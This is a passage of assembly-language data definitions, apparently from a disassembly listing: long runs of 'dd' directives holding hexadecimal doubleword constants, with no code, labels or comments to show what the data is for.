		dd 0F69AD8B9h, 701D4FDEh, 602DF4D3h, 6D1C7667h,	0E653FAC0h
		dd 0C28618EEh, 59E75A2Dh, 0FD65C3F0h, 0AA268B46h, 98CF9489h
		dd 0CC028557h, 8CB2BFDCh, 0C8BBB75h, 61C76102h,	23D8CBBh
		dd 734E6598h, 8261C250h, 0CDCA3299h, 0F551E9C2h, 0CFF6058Ah
		dd 534FA756h, 0C31B1D70h, 5AD5A5A3h, 0DE1BDDEBh, 0D28F32F4h
		dd 691CC235h, 95743A90h, 0DE5A84F9h, 3FE4574Eh,	0BED4B8BEh
		dd 0CAC592ECh, 0F14C0123h, 4D2F7B18h, 0EA815DCEh, 1B665225h
		dd 1288BE93h, 8D86E5D4h, 0F03EF449h, 8EC1D96Dh,	0CBD4081Ch
		dd 0FE7F4E0Eh, 0BE9FC209h, 0B7BF89E6h, 0E053F0D9h, 1A4ACAF3h
		dd 9BE7A67h, 9CD6E538h,	101C36ECh, 0B1F76CE2h, 4A9BAAE8h
		dd 4921B526h, 6C679968h, 8B5210FCh, 0D2B1C6C7h,	5F3DD5E6h
		dd 67C66F60h, 35744CFDh, 3B36990h, 19DEA677h, 27D0951Dh
		dd 11EBDED6h, 79A65CB1h, 0D066B96Dh, 0A9329B9Bh, 36D637C1h
		dd 0BB8BCC64h, 3355572Ch, 3A4D7325h, 0FE70F87h,	0C0857B5Fh
		dd 0C4E56B90h, 30297E6h, 761EF306h, 60935BA8h, 0BDB302BDh
		dd 30A2BDC2h, 489F154Eh
		dd 0BB9C69F9h, 0EF00E952h, 724F29AAh, 0D5FDD491h, 74F7A511h
		dd 7D9533BCh, 3CBE1391h, 5360FE70h, 89549D9Eh, 61F65248h
		dd 0AF3F276Ah, 0F5A2537Eh, 0DE93C408h, 22D029B4h, 3E6753ECh
		dd 2A4E7EBEh, 0DFB7055Ah, 5B28012Ah, 3D18C432h,	75157E3Fh
		dd 8C271F3Eh, 0BE4657C9h, 45386703h, 0DA3F5DCEh, 3B392FB0h
		dd 5BB7B3DCh, 0C692C621h, 19811DC0h, 7FC7624Fh,	0DD20D482h
		dd 40D8F563h, 1D6F3965h, 7C45555Ah, 0BDB3AE55h,	53817BD4h
		dd 7314355Ah, 7ED7E843h, 23EBF8A1h, 744C0E25h, 51CDC3F0h
		dd 0B5EF8ACDh, 4CAFCC51h, 3429B4A2h, 0B7CBFC1Fh, 13979764h
		dd 595155C8h, 72969873h, 3FD6FB2Ch, 0B6BCA8EDh,	0A5FF5FCFh
		dd 0F70F52ABh, 0CDE1F39Ah, 8C0ADCDFh, 4A1D078Bh, 67DD3151h
		dd 0B15809C1h, 0BD70DAE4h, 0E5B10975h, 0E52F9649h, 0C24E7656h
		dd 358309A1h, 1EB8BAC9h, 5958E244h, 8DA218E5h, 0D2CAAE6Ah
		dd 0A6F492AEh, 3ED677E6h, 0F9125AFEh, 72CBB581h, 8050CE12h
		dd 0AD1D3090h, 76B8C5F6h, 79F7481Dh, 2CB9B053h,	0BB98B43Ch
		dd 0D9784D4Eh, 8C5D6354h, 0A6219C66h, 0DE58BE7Ah, 0F5F370F9h
		dd 893E8352h, 790A6FF6h, 331BB0A3h, 0BAED8CA7h,	9F6305A9h
		dd 0CAE958D4h, 6F95E5B0h, 52B29B24h, 0EC1A68C3h, 42133DA5h
		dd 3DB4F91Eh, 97F62367h, 0B03E1107h, 7395B94Bh,	0F6D86BFEh
		dd 0F615762Fh, 0CA7E7467h, 0EA415421h, 7AE7CA05h, 679DF526h
		dd 0BF1E3972h, 4443D9C0h, 0CA86089Fh, 3954AAFEh, 0C7DE040Ch
		dd 0ED3EC07Eh, 4BFE02E2h, 0AAA2C5E1h, 6A2C6EF9h, 0C297F393h
		dd 0BF12EFF0h, 86C79A2Bh, 0C64478FAh, 965603CEh, 6972CE09h
		dd 0F12E21DBh, 0D0AF81F2h, 117D8DCDh, 0F6EB55DDh, 8D1EBDD6h
		dd 0CF7553E1h, 29B6AFBAh, 0DE88600Fh, 86AE4DE9h, 1235C0DBh
		dd 50F57765h, 0A99AB54Eh, 9857249Bh, 554D601Ah,	71EEC43Ah
		dd 0B1187D16h, 0CC86B62Eh, 16B86C7Dh, 27A22188h, 949D41F8h
		dd 4F84AF0Bh, 31D27181h, 0B7535B89h, 8CB955DFh,	0F657B58Dh
		dd 3EDC6C5Eh, 0C2F10E39h, 95EDCAD1h, 0B4EEB79Ch, 68E8537Ch
		dd 9A518518h, 118C8F7Bh, 4D056A5Fh, 965BC22Ch, 93DEA908h
		dd 15FE9968h, 2F80B7BFh, 0BF25733h, 0C66ED76Dh,	265B23F5h
		dd 0B84B8966h, 2D553A28h, 9D5651BBh, 0A1685012h, 0D563AE11h
		dd 5886D605h, 0F36522F1h, 97811BFBh, 32F660DFh,	19FD0D9Eh
		dd 0E2D4CF31h, 7FEEAFB7h, 9B3BA9C6h, 1481BD66h,	4D58A5BAh
		dd 525A4AEDh, 742EECC3h, 3EB4FBAEh, 1EC9698Ch, 6F4640D8h
		dd 0C5F13F06h, 0EDF94B88h, 60288AFEh, 0D0F34E27h, 2B15CAE9h
		dd 3EDD3E9h, 0CFD4570Bh, 3631D4E9h, 0D436989Ah,	187E5C9Ch
		dd 2576034h, 89793F25h,	8D957BF0h, 3495AC6Ch, 0CF6AFBBAh
		dd 2D2B9D63h, 4F65E853h, 0C13DC7F5h, 0F7CC20A9h, 0C1258512h
		dd 685506ABh, 0F7AEB47Eh, 5C28FF8Ah, 0FD9F4EB0h, 0C1E17A16h
		dd 14A0EF95h, 0AEF0C30Dh, 95714F6Ah, 0DD9A9270h, 3F0506A8h
		dd 0C5F79DA3h, 0D5E1FD17h, 5B2A4447h, 0D51A5FC7h, 5D67568Eh
		dd 7C2319E7h, 23CFB0DBh, 7F12DD16h, 0EBF6547Eh,	0AEE05C91h
		dd 5B1B8D93h, 11774BB7h, 462D8C3Fh, 778D3CC4h, 795AFC5Ch
		dd 90BE1A41h, 583BFBCh,	0F16BC2C8h, 0A8B82D81h,	31712771h
		dd 98C98E68h, 0D9FE8761h, 6F9D5915h, 89DB4F84h,	274B9903h
		dd 5026A813h, 0F7545B2Bh, 67B0A434h, 9211FBE5h,	75D65D60h
		dd 68BF923Ah, 0E3B56B13h, 9DC26426h, 99D581EDh,	39DDDAB7h
		dd 33F77B83h, 0F8BA662Ah, 88F4D25Bh, 6DE418E7h,	0F587A3BFh
		dd 0F5F82F11h, 181817E0h, 797EFCFCh, 0C1E76E3Ah, 0B6DE75A2h
		dd 0AD3C66A5h, 0C2FEAAFBh, 0F95012A7h, 0FB229338h, 40D68C9Ah
		dd 4CA1E030h, 3DD3685Ah, 84C2BB41h, 0F9F1B5F5h,	5FD4CCCAh
		dd 0FD9CE0AEh, 0CC6B0F03h, 62AB7035h, 6D1F24C3h, 69A28916h
		dd 0C57EF2CBh, 0A7DBABCEh, 849D8C85h, 70792A82h, 9FC504F3h
		dd 6457D0A8h, 3845F732h, 3D6DB2F3h, 19739C12h, 49E6985Bh
		dd 13963AF5h, 1C32C923h, 0D15C428Ch, 23248E46h,	2494ECADh
		dd 8EBA129Ah, 7E9C4B7Ah, 0E14C759Dh, 0CB9D4F25h, 0CC2FCABAh
		dd 26D62114h, 4362B876h, 755DBCC9h, 2BF2F8B8h, 47E582F2h
		dd 19EB5B1Eh, 5AB15DADh, 7DFBDDD8h, 0F95B1B53h,	0F03C3CC3h
		dd 2330E8F0h, 97AFBE77h, 4E8EA83Ah, 8E7BDEF9h, 7BE48463h
		dd 7131FDB6h, 0D839A5E6h, 7B367997h, 136C2EF5h,	0EBA17F3Bh
		dd 0A3A63697h, 0A6C6F8C9h, 53110A3Ah, 0B3929F8Ch, 2E4D416Fh
		dd 7B43EA4Eh, 9DBF3817h, 7A542097h, 9E089ACBh, 21813A43h
		dd 0BE1E2626h, 8D4FE77Dh, 4F0F3B4Bh, 75BC443Bh,	0EE0BED71h
		dd 0D593E9D6h, 0A84BFC55h, 9F1BC302h, 16E5DA07h, 6C05B547h
		dd 80B6DF83h, 0B03DDF69h, 26EFBCC6h, 0E5BEFD9Ch, 4507E153h
		dd 0A22AD0BFh, 994135FEh, 60D1F6CAh, 35F8588Dh,	5DE7B119h
		dd 0FAFCCC79h, 8DE337A9h, 3ECDCE07h, 26509769h,	9752B037h
		dd 0ECBFF92h, 3FD6577Eh, 9DC14CD7h, 9961C591h, 237E57B8h
		dd 76D644E8h, 4EA5A46Dh, 630D693Dh, 0DBD95B55h,	48513C4Bh
		dd 3C5C057Fh, 0D1813ED5h, 65A01ABEh, 0E343D2DEh, 4DEC4AC5h
		dd 0B1182EABh, 74CDFA54h, 0E2EA344Fh, 74A5899Fh, 54D6682Fh
		dd 25B48BC7h, 0F09CABB9h, 17B89ABBh, 0F768C3F1h, 4C4BB0F7h
		dd 6A5E8FC5h, 8AD391E2h, 3A448E38h, 574C38A8h, 0FA14B56Bh
		dd 4EA807B6h, 339A4D50h, 0D147B596h, 0C1D4AF68h, 0A737B311h
		dd 7E7EFBEAh, 829D5B31h, 55B4DE55h, 2A873330h, 0F4E6D55Ch
		dd 0D38E3CBEh, 52F2712Bh, 5A3CBAAEh, 0D460B210h, 7F5C755h
		dd 0D056EF9Eh, 5580F980h, 68C98566h, 2281C0CBh,	6BDDFDD5h
		dd 0F0BA7985h, 7CF0A703h, 0D92B6FA0h, 5968E88Ah, 9A63AAD8h
		dd 0F4DC8CFDh, 86E76927h, 91969A45h, 0C75ABC38h, 0D63E2CCCh
		dd 0A4DF6AF0h, 992AC229h, 549B2AE2h, 8C46B3A3h,	19B35FB6h
		dd 944A196Eh, 0AA2E2D16h, 5C9E7F9Ah, 0D64C053Ah, 0D2733625h
		dd 4BB78B30h, 56A9E437h, 29A99CBFh, 1B2E8D84h, 77A754AFh
		dd 20D0052Eh, 40B8678Dh, 0CC45B5D3h, 0EA1AF226h, 0D727FDB9h
		dd 0EEFEF90Bh, 0B6BB5CE7h, 5E285190h, 0D18F2585h, 0A873AF16h
		dd 0F062F4A9h, 28C6DC3Eh, 0E0C4828h, 7A177F4Ah,	6626CDF2h
		dd 0A2CBF474h, 0D46B0AB5h, 24376692h, 0D88CC86h, 78500ED4h
		dd 5C8ACD60h, 3CA2EAFEh, 383EBB13h, 0A11CE29Eh,	0FD6F9B6Eh
		dd 2EC48A8Ah, 5BE6C4BFh, 1F87F391h, 0D1563561h,	0DC79E326h
		dd 3979CD52h, 17F5D5CDh, 87A9A673h, 3991087Eh, 929F98C2h
		dd 7E99C272h, 0B54070FEh, 0D0E5BC22h, 0BDC7E86Ch, 0F2A7D67Eh
		dd 0C7F0D6D4h, 3E73C1F5h, 60D3E79h, 0A58FE778h,	0D578F682h
		dd 4FB4CEAh, 0C76D70FCh, 3F7B68A7h, 6E21EFF0h, 0A6C09583h
		dd 6662CAB1h, 0ECCC29A6h, 0E7635843h, 0EEF7FF80h, 3DEB7BA9h
		dd 4CA7516Bh, 8193A3DBh, 0D5800C0Fh, 0CA6AF0BEh, 10F667CEh
		dd 3AC940BCh, 168E320Ch, 6C4A001Fh, 5E0FDB38h, 11B29979h
		dd 0FAB5D20Ah, 911E75C2h, 857E34BEh, 0E60F9B1Ch, 0FD9CB686h
		dd 0BBBAFDEFh, 31BC646Fh, 13466DEBh, 303D751Dh,	8EB9FAE8h
		dd 0E2A36AFDh, 0A9336D87h, 0CDF96F8Dh, 4EED65E2h, 45FA1B10h
		dd 0F3CC4677h, 63EF04E7h, 0AB70776h, 2E843887h,	0F5CF2DDAh
		dd 44906D17h, 0D0661DCBh, 7C0ED3DEh, 67FC3D0Eh,	835F0595h
		dd 5AB3391Dh, 0D25D1F81h, 0EBB6945Dh, 0ADCC4315h, 7470E156h
		dd 9D5DCE29h, 0AEB7D2D9h
		dd 0C8437339h, 0B4EFD5D1h, 0B2DF583Dh, 8592BC03h, 0DE2A8EE2h
		dd 8D3CC148h, 6E9DF328h, 323C88AAh, 52BB8994h, 7DA560EEh
		dd 0A305D2C5h, 39B2F2ABh, 0A6670EC9h, 889DF5E4h, 5D6E40A7h
		dd 542EA576h, 0A898C509h, 0ADC1B292h, 0D594B437h, 0CABCE746h
		dd 0B1221C0h, 5625BBD4h, 0D869D7E8h, 55152D68h,	0AC4E1749h
		dd 9CC3DC44h, 8C9F05B8h, 3B57151Ch, 4F8E4A6Dh, 3F9E738Ah
		dd 0C366CF37h, 0A35097FCh, 46A2123Bh, 0A5B8914Bh, 0D77ECDC9h
		dd 67466311h, 0ED108B11h, 1F7BCEF0h, 85FE95D7h,	0D25F57A9h
		dd 0B03E9FEFh, 0F29FC601h, 0F389BF35h, 0FDE2A62Fh, 0E94BEDF1h
		dd 6F51FC3Eh, 7C6B925h,	0B1B43253h, 832B7599h, 68F225D2h
		dd 45A0B7C9h, 9D3676A9h, 8DD18F31h, 9F1FA3FEh, 0F9483602h
		dd 5F24E846h, 928C9557h, 6773097Bh, 9A0BBE2Bh, 0FB94E196h
		dd 0C0FDC552h, 7D733CEAh, 8FFEA8B9h, 0B17B60D3h, 2EACC3F1h
		dd 9A782BAEh, 7C2AAF88h, 76283554h, 3042E354h, 542D96DCh
		dd 0E26F11Ah, 1073160Eh, 0D3EAAAE7h, 36D82FBDh,	0D3035751h
		dd 0C63E6A95h, 0E652C0E4h, 6D15F360h, 0F2FF5C6Ch, 6C4D1AF7h
		dd 1A32227Eh, 0B85E271Ah, 53B51813h, 0C67C5DC1h, 3FF4BC1Bh
		dd 0ABA58D64h, 55702A24h, 604A4CE2h, 0E13A221Ah, 0B4BECDA2h
		dd 0C18E5DD2h, 0D987AADEh, 717092F5h, 4846B4Fh,	6A4B5752h
		dd 0FEF8219Bh, 1E118544h, 17D3F78h, 27FC4F95h, 49834A4Dh
		dd 8C22D91Bh, 0A3D298F5h, 447CEB95h, 4C68E54Bh,	5F1E1558h
		dd 9C641659h, 10C5BEAFh, 0C7164B6Bh, 7874AFBDh,	0FDAD891Ch
		dd 0E7768958h, 0E6A3490h, 0BD043390h, 20DF3AF7h, 0EEBFABDAh
		dd 0B35D8C35h, 83E9239Eh, 1EE5DDBAh, 0DF7A6769h, 8F0E31C2h
		dd 1A0C4F07h, 0DA4F575Bh, 0B87E6655h, 256CBA51h, 599A1B1Bh
		dd 38E5950Eh, 0CE828AB0h, 0AC7341E8h, 0AFBE3EA6h, 441A17EBh
		dd 6C62C282h, 95570B21h, 165D94AFh, 0FFD75AB8h,	0CF674A2Ah
		dd 2C14914Eh, 0E2A65973h, 675B3D1Bh, 550D966Ah,	716B78EBh
		dd 0D1A4B25Ah, 34EC6FBEh, 0AB0FEF64h, 0E505C29Ch, 904C4E43h
		dd 0BC0FCA9Dh, 8EC0E6F9h, 0CAB271Bh, 8BE1572h, 0A5562E8Fh
		dd 0FC916EE9h, 0BB01C2EEh, 0CC67FF30h, 4698E305h, 74F9E195h
		dd 0D7096797h, 0D39EBA5h, 0D112861Bh, 0A072BDFEh, 78B2F3DAh
		dd 951EED19h, 0EF66EECFh, 5CEAC0F3h, 6E1DFED7h,	628DB153h
		dd 3B29DC50h, 52BDC3A3h, 0BAD0775Dh, 0AA77BF1Fh, 78778848h
		dd 6C983EE0h, 3306A495h, 0A9C48947h, 0F64F620Ah, 98373128h
		dd 68A38615h, 3EE35F1Eh, 776F7097h, 10330FC0h, 1D06EC63h
		dd 0CD0BBB9Eh, 0DF829519h, 226A9EFh, 0D2E936A9h, 5C3B2784h
		dd 0A19EFA1h, 7AE9CD8Fh, 92B3D76Ah, 7E1FD310h, 0AA5A9B91h
		dd 0E0ABCF9Fh, 8A055B22h, 0AA92938Dh, 7DCDB956h, 24746075h
		dd 59BC81EDh, 0D4B8A74h, 0FD00D8BCh, 4E2F22D5h,	533EBAFDh
		dd 0E2E581FBh, 0A5B8B06Fh, 2BDE9072h, 7071D030h, 39849931h
		dd 1F26A45Dh, 0E06F95FFh, 36BB2ABFh, 0DA26607Ch, 0F0C7CE12h
		dd 42E18DEh, 6349D396h,	0B27F02A2h, 0ECBAF94Bh,	0C4355BCh
		dd 0CDF91EB9h, 0FAC26D68h, 89D12614h, 4D5DAA5Dh, 55F7D1E0h
		dd 0F94EE1D4h, 0CF263144h, 339F61F8h, 0B6EDB83Eh, 0B2467E1Ch
		dd 7226C8C1h, 376D97E7h, 3677B4FAh, 0F0AF0102h,	0CB249955h
		dd 5AFE6B44h, 6CA4D3D3h, 0B0FC3812h, 0DE3C84AFh, 781E1C57h
		dd 3DFAE729h, 33B19443h, 99E2DE5Ah, 50EC3C46h, 0F94124B3h
		dd 18C68EC3h, 45F2749Bh, 2EDD8717h, 0C2D634B6h,	8975104h
		dd 0BB1A268Eh, 0D523F7CEh, 7951466Ah, 0A9E0EEF0h, 0DA0AEC4Ch
		dd 0F1F59ADCh, 3B5D4FF5h, 317CF7B6h, 32A8EA83h,	0F050936Ah
		dd 1E6CC08Bh, 0FC0DCEE3h, 0FE5F74F0h, 42EE96D5h, 0B74C38C9h
		dd 17A7E2E0h, 0CDC0451Ah, 0AB47BA38h, 0A903FA89h, 6F277515h
		dd 0DFA032E1h, 776F7A88h, 50194F1Dh, 2723BA93h,	0E665282Bh
		dd 3A4D907Ch, 0E105D78Eh, 0F7753EC8h, 0A2ABE77Fh, 0DCA2E6FAh
		dd 409D9611h, 7EC52EFCh, 0F81B0BCh, 0BEF04976h,	6C7FBD85h
		dd 565D349Ch, 7573D6B3h, 0CF7782ECh, 0F590B4D1h, 50F148CEh
		dd 1F0E86E6h, 2CD06777h, 36E82DAEh, 626D9852h, 485AA8D3h
		dd 0A4B72014h, 0BE84AA08h, 0D2C85DC3h, 0B22B4D42h, 55F1C134h
		dd 28E0AC63h, 0B96C088Ch, 0C94CCEB2h, 9023F2E0h, 0F878C82Ch
		dd 3BC1EE35h, 3836DCC3h, 31F5F33Fh, 0E878827Dh,	12FC3AF6h
		dd 474F8057h, 1B9C17A4h, 5DDC33FCh, 59345A28h, 1AACA729h
		dd 23DE3E94h, 0CC6580BFh, 14C05A4Fh, 3ADF066h, 9635615Bh
		dd 37C5B11Eh, 5FC65EFAh, 188CD110h, 14112115h, 7190DD48h
		dd 5D18804Fh, 81450774h, 0A3B04571h, 510A384Bh,	804FECBAh
		dd 5F4F439h, 8D437194h,	0E8C1812Eh, 9A3A31E9h, 7A32068Ch
		dd 0CE268C1Ch, 0C68C49A8h, 0C142A8C1h, 0D3E0C68h, 542AA196h
		dd 163A6103h, 0D61D9BCCh, 55982B3Ch, 0AB474F4Eh, 56A8F392h
		dd 7B3506B7h, 0F8D39C66h, 0FB72C1AAh, 0B8AB3FBEh, 77E8843Ch
		dd 0B65C5DD9h, 57D814B5h, 7C59E5CEh, 20B6E646h,	9CAA1B61h
		dd 0AE0BECC2h, 0FD38EFC4h, 360FBC7Bh, 0F82B3E89h, 54D71BE6h
		dd 0B6518D02h, 1B515351h, 0AB850FBFh, 0D32B6DE8h, 7190D94Fh
		dd 0F376786Dh, 0AF2E2344h, 58488F0Fh, 0FB2FFD45h, 338CB0D4h
		dd 49290BAEh, 45CFEEF7h, 62BB1E53h, 2C9550B4h, 0F52AEFF0h
		dd 0F0BB7CAh, 0BE61177Ch, 1A39C322h, 0F68C1641h, 0F8025B3Fh
		dd 0A46BF7FAh, 8342FC68h, 0A9C5D35Eh, 0D257147Ch, 0BAF89DC3h
		dd 23DE6056h, 0DCBF303Eh, 0D4D8ECC6h, 0E0F5CB3Dh, 24E054DDh
		dd 9FEA17BBh, 557BF217h, 988DAF03h, 0A82B7B0Dh,	1AE9F4A2h
		dd 0B44CF90Eh, 0FB95FDA0h, 1DE370FDh, 0A4EE7A5Ch, 0E1541514h
		dd 0B6529D61h, 684A99AFh, 5CA413BCh, 0FA89AEBCh, 0B496A796h
		dd 0C28A7F31h, 87317758h, 3034FBF5h, 7DDC56CDh,	45FB55A4h
		dd 6D130F7Ah, 0A9E1A347h, 0FC1688A0h, 8D6F6F90h, 5A272ECh
		dd 58A0E687h, 0BF720F1Dh, 0FC164ECAh, 58844548h, 3CBFD366h
		dd 5FD53C55h, 0FDEF8E9Ch, 0C72BFEFCh, 0BCFB4F49h, 0FDADF7ACh
		dd 79F15223h, 0F1A30766h, 1634871Fh, 50A85359h,	2170A84Fh
		dd 69BE8386h, 141E534Fh, 53FD71F7h, 0E1D874A6h,	40486293h
		dd 9C31D64Eh, 0E0C6612Ch, 63BFE381h, 0F97793E7h, 0CDAADC10h
		dd 9AA5F2F1h, 0EA7E07E1h, 889FE7B6h, 0EBDD617Dh, 12FD6BA3h
		dd 3DFE48ACh, 0A67D1BD3h, 0C76D7EAh, 0A5F46C3Ch, 0C5632AB0h
		dd 0B4477E8Eh, 5836A171h, 0BA58A0CCh, 22E0A3B6h, 2A824958h
		dd 0A6E0F16Eh, 6DEECFF5h, 5FA17AD5h, 0C8A13640h, 9BC5CAF3h
		dd 0FBF1533Fh, 0FA17E526h, 0BE356B32h, 0E16C4128h, 9B5BCC1Eh
		dd 571FD586h, 0DCA87ED6h, 2C172C1Ah, 99F78AA1h,	0D5958ED1h
		dd 0D169CF69h, 0FD3D60D4h, 0CE39FDC5h, 0E59B5D4Ch, 0CBADC124h
		dd 0F1BC76B8h, 41813ECEh, 0D3E5966h, 538176E8h,	0FAA04195h
		dd 188A0C89h, 41C885FEh, 0A4D111C7h, 9A4B8CE1h,	2B46D048h
		dd 0CB3BEF31h, 10FC127Ch, 586856EEh, 9B336D21h,	826D6A6Eh
		dd 81E38780h, 0FBAE9335h, 7749C731h, 0F8E0C973h, 0D87ECD59h
		dd 1233ADD1h, 0FE111FE8h, 0C4AC3F73h, 0C22351Dh, 0A698B459h
		dd 6AA95637h, 137AFA33h, 0EE483F12h, 91893ED0h,	0D5E51DB6h
		dd 8D9A62E1h, 299B6ED0h, 7E4EF0C6h, 0FF77FC91h,	99D3AFDFh
		dd 0F17314C3h, 0FCC691FEh, 55203564h, 63FF99D7h, 0E74FB942h
		dd 0DD2B2EF1h, 9672F5DEh
		dd 0F4608B17h, 0B5FD183h, 0FBC26B5Dh, 0D5FC0F55h, 12083D3Fh
		dd 978053FAh, 5A11AFB5h, 3579352Ch, 4FE6A1D3h, 1F3307B3h
		dd 0C47BD57Eh, 45C9CB9Fh, 0A8FBD68h, 0A84DD7A8h, 4ACEF478h
		dd 0E64E8936h, 834A4D17h, 0F12BE05Fh, 86F0A257h, 0F626A064h
		dd 0E6126BBDh, 9F8F338h, 0E0A9D74Ch, 0F5F9C60Eh, 9FC9BE93h
		dd 6C96CD48h, 29CFD638h, 40C98AD1h, 0D540458Dh,	8F93DD20h
		dd 79E355FDh, 5239CC75h, 3029B1FEh, 0C9F38EF9h,	592E28h
		dd 65714929h, 0D070E655h, 0B6A82454h, 0CE0E82Bh, 0E652966Ch
		dd 27D2F2A6h, 0FA45E801h, 2C8BF132h, 40493190h,	2FC3976Eh
		dd 0A170E3E2h, 0ECF7057Fh, 2397DE25h, 93EEAC59h, 0D0ACB6C5h
		dd 4CE76207h, 0B91362E2h, 0C497268Fh, 98BE334h,	9B592575h
		dd 3B4714F3h, 0BEA02DDCh, 11E9EE15h, 98DE2CF4h,	6B591AB2h
		dd 78468CCDh, 3FCAD45Dh, 0D0FA28DBh, 0A792C885h, 9D32BC67h
		dd 66763F9Ch, 9990870h,	54BC193Ch, 0FE66039Bh, 0E262434Bh
		dd 9832F477h, 0ED7F2526h, 0C7E11F9Ch, 2379DFA2h, 0BEF01C96h
		dd 0DA11ED50h, 39871A6Eh, 94F5C90Bh, 13B122BBh,	0B83E6381h
		dd 0E8FFDF07h, 1306BA77h, 3B0342Ah, 0CBD069Dh, 43AC2C4Ch
		dd 0D1FC65DEh, 94273792h, 0A1CC8A67h, 0AC61AC92h, 7CB44DF1h
		dd 7459B5E6h, 0A26B8C8Eh, 0E9B4B0E8h, 0EFC3A10Bh, 0A02EA477h
		dd 0D52EE6Ch, 9AF46A55h, 0B179763Dh, 5E736A34h,	0F64A91B7h
		dd 0E7837B86h, 8852CE16h, 62FC2FCAh, 695F897h, 651F2B84h
		dd 4A8C09B4h, 0A8A751D9h, 0D40CBB0Eh, 0DE1C582Dh, 0F18D07A0h
		dd 0D2DB5C16h, 1ACC54D3h, 5197045Eh, 81F64BFEh,	72DF0E1Fh
		dd 40997095h, 0B0639C0Ah, 4DE5B7B2h, 81F7C93Fh,	0D5075F3Bh
		dd 0D2EBC4A3h, 8D19619Ah, 0EB5FDF52h, 0F140980Eh, 0E8EE0B6Bh
		dd 2BAC6D06h, 0EB9279D2h, 0E16AB03h, 10EB5AE7h,	230796BFh
		dd 0F6308994h, 83FF49C8h, 7B4E455Dh, 0F6F33FD4h, 0B1C207FBh
		dd 7E32BE62h, 128297D8h, 0E5546B5Dh, 712DF8ECh,	845DB977h
		dd 0F3D59DBAh, 0BCD2764h, 86D4A1F8h, 0B1AF7DF5h, 7192FF6Eh
		dd 60990FA7h, 35AE16BFh, 4215AC24h, 0AF0E82E0h,	6735D74Ch
		dd 0B8FA2894h, 5045F8B5h, 0E99F6681h, 39D56CFDh, 19BAD2D1h
		dd 5FEDEB57h, 7E36D5AAh, 7454139Dh, 7A7F9816h, 0B467BC09h
		dd 446BCA6Bh, 24A4B5B2h, 0D568DB07h, 8F10DE40h,	0B37A5A5Dh
		dd 0AACFFDCEh, 8B96550Bh, 76881615h, 7EF6AD9Ch,	2FE94262h
		dd 1BC5250Ah, 2D078B2Bh, 0B5EF50EBh, 0E48517FCh, 0FE33774Dh
		dd 86814F53h, 0DE1A0982h, 0C4FA644Ah, 0D5E1F8A7h, 3AAFA32Ah
		dd 0DA06445Bh, 310A3657h, 0D8BC0EFDh, 0B68EDE99h, 9DC67CB2h
		dd 17B86CEDh, 0A0558A59h, 3B77E717h, 85E68326h,	0A7AD540Bh
		dd 0B896C16Ah, 9257F416h, 94C251E6h, 6362A890h,	5A2AFCB7h
		dd 0B613B1B8h, 506DB424h, 0CAA5B17Ch, 0FA824B5Fh, 0C0836835h
		dd 3108481Ch, 0D39EE52Ah, 9F1B2F0Ah, 0C7D8DBE3h, 0CFB664CAh
		dd 1D4EDC28h, 81EDF699h, 93E8260Dh, 0A602E236h,	4DB74B3Eh
		dd 0C58C56E9h, 242C5576h, 4FE976B4h, 8FEDF9E4h,	0F23A297Bh
		dd 0BD8EFEC0h, 0F50A53D8h, 6D962677h, 0D359C6BBh, 4FFFD690h
		dd 5526F8A6h, 6768CAB8h, 9FAF79FAh, 0DBEAF1E8h,	753F03F8h
		dd 0C33BBA54h, 4AB16A17h, 16ECFA9Ch, 5A22027Dh,	0B19EC3F1h
		dd 39448884h, 0ABDA8B43h, 110B9F50h, 0F2C51821h, 9A491693h
		dd 0A9DC6254h, 86A320B1h, 8B3B0DC5h, 0AD062EB4h, 3D12B942h
		dd 7691CE07h, 0F12CA355h, 432A3A7Bh, 2BBBDABh, 5CED6FC6h
		dd 1419CBC2h, 0C37E1AF1h, 9EBD9A13h, 7CE97DCBh,	3A6E1169h
		dd 0BCAB5ADAh, 2BA1AF9Eh, 0A659182h, 8A48BF82h,	2D037380h
		dd 0A1EAAD16h, 0F8796509h, 0B98B70E1h, 0A28CFB92h, 0DED78BB8h
		dd 25634B9Ah, 0DFE80C8Bh, 9EABE47Fh, 5F140EFDh,	0A9B4F16Ah
		dd 56CD8E82h, 7157B606h, 33B99132h, 91D018CFh, 8A2258EEh
		dd 2A5408EEh, 55D4FA1Ch, 592EB60Ch, 0F592DC89h,	51FD715Eh
		dd 1D760ADCh, 1515F6AFh, 132BC8DAh, 0ABEA3CC3h,	9177B3Bh
		dd 0A68EFF39h, 1FD9C349h, 45FCCBA9h, 5D5DF970h,	8C7AD05Dh
		dd 0C1288E3h, 0EBEBE104h, 7AF65A88h, 1ADA3F75h,	0AA5FB9FEh
		dd 0B048270Fh, 0F830C3EEh, 8FEC2565h, 0D4B32AB4h, 0B8BAA138h
		dd 734BAF52h, 6DB57DC5h, 2FD268CDh, 90FA7D95h, 0B59BBBDCh
		dd 57518272h, 0F5478C43h, 0B3DBA96Fh, 0E5C914BFh, 0FF45968Ch
		dd 0DBE2ACE4h, 62E5E1F8h, 0D4DEE0DAh, 2F95CBE8h, 0BFA5CD74h
		dd 0B2F8998h, 0B84A3C56h, 87E0FD11h, 256D09FEh,	3EABFD78h
		dd 0FB33C19Fh, 5609FBE0h, 5954465Dh, 0AAE9D097h, 2B308C0Fh
		dd 0F2763D26h, 0B12BFEDCh, 0C79F5D42h, 0A9F67715h, 53FF14CCh
		dd 0EC7007EDh, 0D65A75ABh, 1E4D1C7Eh, 0B70F7406h, 7461A6BBh
		dd 0A456C469h, 80474F58h, 185FDD5Ch, 2D127D93h,	0DD3A7BE6h
		dd 2FF33A6Bh, 6C707E36h, 3ECBED6Eh, 0DBA8FC61h,	18B94E0Dh
		dd 576948F9h, 6157CC0Dh, 81369CF8h, 0F150163Ah,	0B252C0F0h
		dd 8DE52D99h, 9EA43D29h, 0DB777555h, 6CBA7F84h,	37265462h
		dd 0D4175E5Dh, 3B03C561h, 0F0B46857h, 0FC06E0D9h, 1F5E7A92h
		dd 0D6B49049h, 0F2FCD1CDh, 0A46F16C6h, 0CFF73773h, 3772F733h
		dd 0DD5DE85Ah, 0B3F94C54h, 0D6B6C331h, 194F0598h, 0D4BDF99Bh
		dd 4DA6A9F7h, 6D80F364h, 7464A6C5h, 0A57CB29Ch,	44B7E176h
		dd 0E4BC086Bh, 0ED7F253Bh, 5F914E18h, 0FC29B6ACh, 94B26BA6h
		dd 63E98D16h, 0E310FF9Bh, 0B4446C65h, 0AA2B8D57h, 5D6E65BBh
		dd 0A0F3A44Ah, 538B9A60h, 5AFD0BBh, 7BE1FA9Ah, 2F145D88h
